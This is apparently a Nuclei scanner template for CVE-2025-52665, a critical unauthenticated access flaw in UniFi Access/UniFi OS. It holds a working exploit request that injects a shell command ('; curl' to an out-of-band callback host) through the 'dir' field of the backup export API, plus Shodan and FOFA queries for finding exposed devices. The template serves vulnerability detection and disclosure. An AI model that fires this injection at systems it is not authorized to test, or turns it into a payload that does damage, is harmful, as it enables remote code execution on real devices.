id: CVE-2025-52665 info: name: UniFi Access - Broken Access Control author: theamanrawat,DhiyaneshDK severity: critical description: | UniFi Access Application 3.3.22 through 3.4.31 contains a broken authentication caused by misconfiguration exposing management API without proper authentication, letting attackers on management network access management functions, exploit requires network access. impact: | Attackers on the management network can access management APIs without authentication, potentially leading to unauthorized control of the system. remediation: | Update to version 4.0.21 or later. reference: - https://community.ui.com/releases/Security-Advisory-Bulletin-056-056/ce97352d-91cd-40a7-a2f4-2c73b3b30191 - https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000 - https://nvd.nist.gov/vuln/detail/CVE-2025-52665 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2025-52665 epss-score: 0.26604 epss-percentile: 0.96432 cwe-id: CWE-306 metadata: max-request: 2 verified: false shodan-query: http.html:"UniFi OS" fofa-query: body="UniFi OS" tags: cve,cve2025,unifi,rce,vuln,vkev flow: http(1) && http(2) variables: rand_string: '{{to_lower(rand_text_alpha(6))}}' http: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_any(body, "UniFi OS","UniFi Dream Machine SE")' condition: and internal: true - raw: - | @Host: {{Host}}:9780 POST /api/ucore/backup/export HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "dir":"/tmp/{{rand_string}}-; curl http://{{interactsh-url}}/; #" } matchers: - type: word part: interactsh_protocol words: - "dns" # digest: 4a0a004730450220211f9e6d2fb9c907e79dd4fff070e4c8b666d753fffeb50c0d700ebc6d6b9e4e0221008b01e0f4ffa2cf230fb8f06c17e42fb9e969a06901e4fb473768dd9497c34e9c:922c64590222798bb761d5b6d8e72950